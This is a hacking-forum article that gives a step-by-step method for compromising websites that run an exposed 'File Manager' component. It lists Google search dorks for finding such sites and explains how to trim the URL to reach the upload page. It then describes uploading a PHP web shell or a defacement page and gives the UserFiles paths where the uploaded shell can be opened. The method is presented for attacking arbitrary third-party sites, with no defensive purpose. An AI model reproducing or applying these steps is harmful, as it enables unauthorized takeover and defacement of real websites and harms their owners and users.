Main » Articles » Web Hacking » Exploits and Vulenrablities
"File Manager" ~ Remote Shell and Deface upload Vulnerability
"File Manager" ~ remote shell and deface upload vulnerability
Dorks : 
inurl:/filemanager/userfiles/ filetype:pdf 
inurl:/filemanager/index.html
Exploit : 
http://www.site.com/filemanager/index.html
Lets Start !
Open google or bing and type dork 
inurl:/filemanager/userfiles/ filetype:pdf
or
inurl:/filemanager/index.html 
Now select any website from search results 
after clicking on website url will be 
http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
Now Delete keywords after file manager
For example : 
Before : http://www.site.com/filemanager/UserFiles/File/xyz/abc.pdf
After http://www.site.com/filemanager/
Now find upload option there and upload your shell or deface Page there
you file will upload in userfiles directory 
To View your upload shell or file goto 
http://www.site.com/UserFiles/Shell.php
http://www.site.com/UserFiles/deface.html
or 
http://www.site.com/UserFiles/directory/Shell.php
http://www.site.com/UserFiles/directory/deface.html
Category: Exploits and Vulenrablities | Added by: MaX-HaCker (12.07.11)
Views: 875 | Rating: 4.0/2
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]

Adds

Subscribe

Recommend on Google
GeniusHackers

3D Tag Cloud

1
2
3
4

Designed By [#]./3X3.R()()T
 Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2024
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz